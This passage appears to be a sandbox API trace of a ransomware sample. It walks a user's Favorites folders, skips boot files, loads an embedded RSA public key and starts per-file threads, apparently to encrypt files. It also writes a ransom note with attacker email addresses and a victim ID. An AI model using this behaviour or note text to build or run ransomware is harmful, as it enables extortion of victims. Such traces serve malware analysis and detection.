HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0044.927] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0044.927] SetErrorMode (uMode=0x1) returned 0x1 [0044.928] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0044.928] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0044.928] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0044.928] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0044.928] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0044.928] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0044.928] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0044.928] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.928] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.928] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.928] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.928] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0044.928] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0044.928] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0044.928] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0044.928] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0044.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="Desktop") returned 0x0 [0044.928] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0044.928] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 44 [0044.928] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.929] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.929] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0044.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x528 [0044.929] Sleep (dwMilliseconds=0x96) [0045.080] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.080] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.080] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.080] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.080] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0045.080] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0045.080] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0045.080] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0045.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0045.080] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="Desktop") returned 0x0 [0045.080] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0045.080] SetErrorMode (uMode=0x1) returned 0x1 [0045.080] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT") returned 61 [0045.081] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0045.081] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0045.081] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x538) returned 0x0 [0045.081] RegQueryValueExW (in: hKey=0x538, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de3838, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3de3838*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0045.081] RegCloseKey (hKey=0x538) returned 0x0 [0045.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0045.081] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0045.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0045.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x538 [0045.082] WriteFile (in: hFile=0x538, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0045.082] CloseHandle (hObject=0x538) returned 1 [0045.082] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0045.083] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0045.083] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0045.083] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.083] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.083] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.083] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.083] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.083] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0045.083] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0045.083] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0045.083] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0045.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0045.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0045.083] SetErrorMode (uMode=0x1) returned 0x1 [0045.083] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0045.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.083] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0045.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0045.083] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0045.083] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0045.083] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.083] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.083] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.084] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.084] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0045.084] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0045.084] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0045.084] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0045.084] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0045.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0045.084] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0045.084] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0045.084] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.084] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.084] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0045.084] Sleep (dwMilliseconds=0x96) [0045.236] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.236] lstrcmpW (lpString1="Suggested Sites.url", lpString2="..") returned 1 [0045.236] lstrcmpW (lpString1="Suggested Sites.url", lpString2=".") returned 1 [0045.236] StrStrW (lpFirst="Suggested Sites.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0045.236] StrStrW (lpFirst="Suggested Sites.url", lpSrch="ntldr") returned 0x0 [0045.236] StrStrW (lpFirst="Suggested Sites.url", lpSrch="NTLDR") returned 0x0 [0045.236] StrStrW (lpFirst="Suggested Sites.url", lpSrch="NTDETECT.COM") returned 0x0 [0045.236] StrStrW (lpFirst="Suggested Sites.url", lpSrch="ntdetect.com") returned 0x0 [0045.236] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0045.236] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0045.236] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0045.236] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.236] lstrcpyW (in: lpString1=0x17be7c, lpString2="Suggested Sites.url" | out: lpString1="Suggested Sites.url") returned="Suggested Sites.url" [0045.236] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x544 [0045.237] Sleep (dwMilliseconds=0x96) [0045.392] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0045.392] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="..") returned 1 [0045.392] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2=".") returned 1 [0045.392] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0045.392] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntldr") returned 0x0 [0045.392] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTLDR") returned 0x0 [0045.392] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTDETECT.COM") returned 0x0 [0045.392] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntdetect.com") returned 0x0 [0045.392] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0045.392] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0045.392] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0045.392] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.392] lstrcpyW (in: lpString1=0x17be7c, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0045.392] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0045.393] Sleep (dwMilliseconds=0x96) [0045.564] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0045.564] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0045.564] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0045.564] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0045.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0045.564] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0045.564] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0045.564] SetErrorMode (uMode=0x1) returned 0x1 [0045.564] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT") returned 67 [0045.564] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0045.564] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0045.565] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x54c) returned 0x0 [0045.565] RegQueryValueExW (in: hKey=0x54c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de3a68, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3de3a68*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0045.565] RegCloseKey (hKey=0x54c) returned 0x0 [0045.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0045.565] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0045.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: 